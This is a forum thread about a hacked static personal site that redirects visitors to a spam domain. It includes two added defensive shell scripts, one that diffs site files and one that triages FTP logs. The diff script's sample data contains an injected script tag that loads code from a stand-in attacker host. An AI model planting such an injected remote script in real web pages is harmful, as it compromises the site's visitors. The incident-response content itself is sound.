My personal site hacked - please help!!!

Started by Gryzor, 09:30, 30 July 10


Gryzor

Hello guys,

I was wondering if you could help me shed some light...

I am using www.gryzor.info as a personal online business card. Yesterday I was alerted by a contact of mine that his antivirus blocked my page.

I check it through online security sites, homepage seems clean. I visit it - clean. Then I hit the email icon - and Chrome/Opera give me warnings about malware being served and whatnot, and when I click "continue" it starts autoforwarding to several sites one after the other...

So I check the code - absolutely clean. There's really nothing in there, just a link to a png, and a Google Analytics snippet.

Now, get this - the png does not appear, even though it *is* on the correct path. Once I've called it manually it appears...

What's even weirder is that it seems it's random - for instance, I just visited the page from my work computer, the png did not appear but no warnings appeared, either (though this might be the corporate proxy kicking in and protecting me).

Can someone please try it and let me know? This is pretty bad for a business card...

Thanks - just don't use IE :D

Bryce

Hi Gryzor,
I just gave it a go with XP + Firefox + Trend Micro. Trend Micro blocked it because the email button tries to forward the user to "http://pills.ind.in/in.cgi?4" which isn't good. Definitely hacked, try uploading the original htmls again and then beat up your provider for not having a decent security system. And take that Google Analytics stuff out, maybe the hack is there?

Bryce.

Gryzor

Hello mate,

Indeed that's the original one - at home it kept redirecting me to different servers...

This is the underlying code:


<html>
<head>
</head>
<body>
<table width="100%" height="100%">
  <tr>
    <td style="vertical-align:middle">
      <center><img src="email.png" border="0"></center>
    </td>
  </tr>
</table>

<script type="text/javascript">
  var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
  document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
  try {
    var pageTracker = _gat._getTracker("UA-109515-1");
    pageTracker._trackPageview();
  } catch(err) {}
</script>
</body>
</html>


Looks ok, damn it!

According to Google, the code is

<script type="text/javascript">
  var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
  document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
  </script>
  <script type="text/javascript">
  try{
  var pageTracker = _gat._getTracker("UA-xxxxxx-x");
  pageTracker._trackPageview();
  } catch(err) {}
  </script>


But, the only thing I can think of is if someone hacked the server alright and changed the files. But how come it doesn't always come up malicious???

[EDIT] Can you copy/paste the source code you loaded here?

Devilmarkus

Of course your website is bad.... It still links to cpcwiki.com.
That's why all browsers block it :)
When you put your ear on a hot stove, you can smell how stupid you are ...

Amstrad CPC games in your webbrowser

JavaCPC Desktop Full Release

Gryzor

Yeah, I know :D It's because I uploaded the wrong files when I changed servers...

Did you see the bad stuff by any chance? Do you have the code?

arnoldemu

Quote from: Gryzor on 10:38, 30 July 10
Yeah, I know :D It's because I uploaded the wrong files when I changed servers...

Did you see the bad stuff by any chance? Do you have the code?
I do, it says


<html>
<head><title>PCW rules</title></head>
<body>
<b>PCW rules!</b> http://www.pcw-rules.com
</body>
</html>


or...?
My games. My Games
My website with coding examples: Unofficial Amstrad WWW Resource

Gryzor


Bryce

Have you tried renaming the file email.html and its link on the main page to something else? and also add the full path to href (ie: www.gryzor...email.html) ? Could it be a hacked DNS ?

Bryce. 

Gryzor

You mean someone would hack the dns server and arbitrarily redirect certain links to point to someplace else?

It doesn't smell like this... because I guess DNS servers deal with the server names themselves, not individual paths and files. So it wouldn't be able to redirect a certain file/link and not the whole domain (gryzor.info)...

Bryce

No, not exactly. What I meant was : Because all other links (which are all external) on the page work properly, there might be a problem with internal links on the server being sent somewhere dodgy. By adding the full path, you might get the server to ask a DNS server to locate the page, rather than using the internal workings of the server that your page is on?

ie: Server says: oh look, www.cpcwiki.org => Go to DNS to find this.
                          but for  \email.html => use internal process that has been hacked to go to something dodgy.

I still think it's something on the providers side that's been hacked and not your page.

Bryce.

Gryzor

Ahhhh I see what you mean, good point there. But indeed, I will contact the host... thanks for your advice!

ivarf

Not what I know most about, but I guess the setup of what DNS you use is located in your account on the server. That file can point to the DNS of your choice (or the page the hacker or script chooses)

Xyphoe

Hi mate

I deal with hacked sites all day long, tis my job :)

Give us a shout if you want me to take a look ... quick reply from me now as I need to shoot off...

But -

Is your hosting server Linux or Windows? If the former do you have SSH access?
Do you have access to er 'access logs' and FTP logs?

Sorry, it's unusual to find it's the host's fault unless they're really terrible. If their server (I take it you're on a shared or VPS hosting platform, given your server's IP resolves to a Plesk page....?) really has been cracked then hackers would be doing far more useful and naughty things with it than bothering with one of your pages.

Do you have any scripting on your site? PHP, etc?
Any includes to files held remotely on a different server?

Also it's becoming more common that FTP credentials are being stolen from the client machine due to them having a virus on their PC.

First thing I would do now is change FTP and any other account passwords and initiate a full up-to-date virus scan of your PC, and any other PC that has been used to connect via FTP to the account. Just to be sure.

Gryzor

Is it really your job? :) So you are a..... HACKER? ??? :D

-SUSE, no root/SSH access
-Access log doesn't show much... I think it gets pruned very soon anyway :(
-Yes, shared hosting and PLESK (it's a business card :D )
-No, no scripting whatsoever. There are a few files from the old gryzor.info with CPC and ST stuff, but they're not linked to and as far as I remember they're pure HTML
-Absolutely no includes, I didn't know about that stuff back then!
-I can change the password, but on the other hand it's only been a month or so that I moved to this host and I did change the default pwd....

If you think you can help, or even if you're just a bit weird, I can give you the credentials to log on and take a look...

And thanks for your trouble :)

andycadley

From your description, I'd suspect someone has rooted the server (or one of them) possibly via one of the other sites under shared hosting. In any case, I'd contact your hosting provider and get them to investigate at this point.

TFM

Quote from: Gryzor on 07:16, 01 August 10
Is it really your job? :) So you are a..... HACKER? ??? :D

Didn't you know it... he's the masked Hacker!!! (Didn't you finish OP, everything will be revealed at the end)
TFM of FutureSoft
Also visit the CPC and Plus users favorite OS: FutureOS - The Revolution on CPC6128 and 6128Plus

Xyphoe

Quote from: Gryzor on 07:16, 01 August 10
Is it really your job? :) So you are a..... HACKER? ??? :D

hehehehehe - no!

Hence me saying 'dealing with' for all my sins. *sigh*
Last night I had a very annoyed dedicated server customer blaming us for his hacked server when his root password was "pa55w0rd" ... dumbass!

But anyway...

Quote from: Gryzor
-SUSE, no root/SSH access
-Access log doesn't show much... I think it gets pruned very soon anyway :(
-Yes, shared hosting and PLESK (it's a business card :D )
-No, no scripting whatsoever. There are a few files from the old gryzor.info with CPC and ST stuff, but they're not linked to and as far as I remember they're pure HTML
-Absolutely no includes, I didn't know about that stuff back then!
-I can change the password, but on the other hand it's only been a month or so that I moved to this host and I did change the default pwd....

If you think you can help, or even if you're just a bit weird, I can give you the credentials to log on and take a look...

And thanks for your trouble :)

To be honest, without FTP, SSH and access logs stretching back before the hack occurred it would be pointless me looking, I mean if they're just static HTML pages - no scripting, no includes etc - then the only possible way is with stolen FTP credentials (you sure you don't have any trojans lurking about on your PCs?) or worse the server's been rootkit'd.

Looking at the access logs you do have would be pointless, what I'd be looking for in there is remote file includes and code injections to scripts - but then you don't have any.

Personally I would flatten the hosting space (ie delete everything), change the FTP passwords and re-upload your site - then go ask your hosting company to find out how it occurred from the logs that will be on the server but that we don't have access to.

If you don't want to faff about, given its a small site I'll give you some free hosting space on my own servers if you want.
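Before flattening the hosting space it is worth knowing exactly which files were touched, since that tells you what the attacker changed and whether anything was added that you never uploaded. The script below is an added example, not something posted in this thread: it compares a fresh download of the live site (assumed to already be on disk, e.g. fetched with an FTP client into a directory) against the pristine copy you keep locally and reports modified, added and missing files. The two sample trees, the file names and the injected script tag are constructed here so the script runs offline; the host `evil.invalid` is a placeholder, not a real domain.

```shell
#!/bin/sh
# Added example: find files on the live hosting space that differ from the
# pristine local copy. Uses only find, sort, comm and cmp (POSIX tools).

# Constructed sample trees under a temp dir so the example runs offline.
# In real use point PRISTINE at your backup and LIVE at the downloaded site.
WORK=$(mktemp -d)
PRISTINE="$WORK/pristine"
LIVE="$WORK/live"
mkdir -p "$PRISTINE" "$LIVE/old"
printf '<html><body><img src="email.png"></body></html>\n' > "$PRISTINE/email.html"
printf 'PNGDATA\n' > "$PRISTINE/email.png"
cp "$PRISTINE/email.html" "$PRISTINE/email.png" "$LIVE/"
# Simulated tampering (constructed): the page gained a remote script tag and
# a .htaccess appeared in a directory that never had one.
printf '<html><body><img src="email.png"><script src="http://evil.invalid/x.js"></script></body></html>\n' > "$LIVE/email.html"
printf 'RewriteEngine on\n' > "$LIVE/old/.htaccess"

# site_diff PRISTINE_DIR LIVE_DIR
# Prints one line per difference: "M path" (content changed on the server),
# "A path" (present on the server, absent locally), "D path" (missing on the server).
site_diff() {
  pristine=$1
  live=$2
  ( cd "$pristine" && find . -type f | sort ) > "$WORK/pristine.lst"
  ( cd "$live" && find . -type f | sort ) > "$WORK/live.lst"
  # Names only on the server: attacker-added files (or forgotten uploads).
  comm -13 "$WORK/pristine.lst" "$WORK/live.lst" | sed 's/^/A /'
  # Names only in the backup: deleted on the server.
  comm -23 "$WORK/pristine.lst" "$WORK/live.lst" | sed 's/^/D /'
  # Names in both: compare content byte for byte.
  comm -12 "$WORK/pristine.lst" "$WORK/live.lst" | while read -r f; do
    cmp -s "$pristine/$f" "$live/$f" || echo "M $f"
  done
}

# Remove the constructed sample trees when you are done.
cleanup() { rm -rf "$WORK"; }

site_diff "$PRISTINE" "$LIVE"
```

Every "A" entry deserves a look even when it seems harmless (a stray `.htaccess` is enough to redirect or rewrite requests for a static site), and the "M" entries show you what was injected so you can search the rest of the account for the same string.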

Devilmarkus

What is this piece of code good for?

<script type="text/javascript">

var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");

document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));

</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-109515-1");

pageTracker._trackPageview();


} catch(err) {}</script>

Gryzor

@Xyphoe: thanks for your input. I'll first contact the host and then perform the suggested actions (and, no, I don't believe I've got a trojan dammit...). About your offer - thanks, I appreciate it very much :) But it's a very cheap host anyhow, I wouldn't wanna bother you :) Thanks again!

@Markus: the "catch(err)" goes together with the "try" function. What happens is that whatever is in the "try" function runs as normal, but if there's any error the script is redirected to catch(err). Since catch(err) is empty ({}), nothing happens. In effect, IIRC, this prevents any error messages from GA's server from being displayed on your page...

Xyphoe

Hi mate,

No probs!

After my last post I realised there was the Google Analytics code, so I got suspicious.

Interesting article here I found - http://www.google.com/support/forum/p/Google%20Analytics/thread?tid=1f6452112c01bb78

Certainly at least your hosts FTP logs will be revealing.
With a very simple grep on the command line of the FTP logs they'll be able to tell you which IP addresses have been connecting via FTP, you can then check which IPs aren't yours (your ISP's) in the RIPE/AFNIC/etc databases.
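The log triage Xyphoe describes, written out as an added example (not code from this thread). It assumes the host's FTP daemon writes the xferlog format that ProFTPD's TransferLog and vsftpd's xferlog_std_format produce, where field 7 is the remote host, field 9 the file name and field 12 the direction (`i` for an upload to the server, `o` for a download). The log lines, the account name and the "known" address are constructed for the example; the addresses come from the RFC 5737 documentation ranges and belong to nobody.

```shell
#!/bin/sh
# Added example: list the IPs that uploaded files over FTP and are not yours,
# then show what a given IP uploaded. Works on an xferlog-format transfer log.

# Constructed sample xferlog (documentation IPs, hypothetical paths and user).
# 198.51.100.7 plays the site owner; 203.0.113.5 is the foreign uploader.
SAMPLE_XFERLOG='Thu Jul 22 10:02:11 2010 1 198.51.100.7 4096 /httpdocs/index.html a _ i r gryzor ftp 0 * c
Thu Jul 22 10:02:13 2010 1 198.51.100.7 2210 /httpdocs/email.png b _ i r gryzor ftp 0 * c
Thu Jul 29 03:17:48 2010 1 203.0.113.5 612 /httpdocs/email.html a _ i r gryzor ftp 0 * c
Thu Jul 29 03:17:49 2010 1 203.0.113.5 9812 /httpdocs/old/.htaccess a _ i r gryzor ftp 0 * c
Fri Jul 30 08:30:00 2010 1 198.51.100.7 612 /httpdocs/email.html a _ o r gryzor ftp 0 * c'

# Space-separated list of your own addresses (assumed; fill in the ones your
# ISP actually hands you, or the whole prefix after a whois lookup).
KNOWN_IPS='198.51.100.7'

# Emit the log: from the file given as $1, or the constructed sample if none.
xferlog_lines() {
  if [ -n "$1" ]; then cat "$1"; else printf '%s\n' "$SAMPLE_XFERLOG"; fi
}

# unknown_uploaders [logfile]
# Prints "ip count" for every remote host that uploaded (direction i) and is
# not listed in KNOWN_IPS. Downloads are ignored: they cannot change the site.
unknown_uploaders() {
  xferlog_lines "$1" | awk -v known="$KNOWN_IPS" '
    BEGIN { n = split(known, k, " "); for (i = 1; i <= n; i++) ok[k[i]] = 1 }
    $12 == "i" && !($7 in ok) { c[$7]++ }
    END { for (ip in c) print ip, c[ip] }' | sort
}

# files_uploaded_by IP [logfile]
# Prints every path that IP uploaded, in log order.
files_uploaded_by() {
  xferlog_lines "$2" | awk -v ip="$1" '$12 == "i" && $7 == ip { print $9 }'
}

unknown_uploaders
files_uploaded_by 203.0.113.5
```

Run `unknown_uploaders /var/log/xferlog` (or wherever the host keeps it) and then `whois` each address it prints; an upload of `email.html` from a network you have never used is the evidence you want, and the timestamp on that line tells the host where to start looking in their own logs.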

Gryzor

Ah darn, your link autoforwards to the forum's landing page... :(

Xyphoe

Quote from: Gryzor on 06:48, 05 August 10
Ah darn, your link autoforwards to the forum's landing page... :(

It does? I've just clicked it and works fine for me? Try copying and pasting into your browser address bar.

Gryzor

I already did, and it does the same... not much sense in it. Can you copy/paste here?
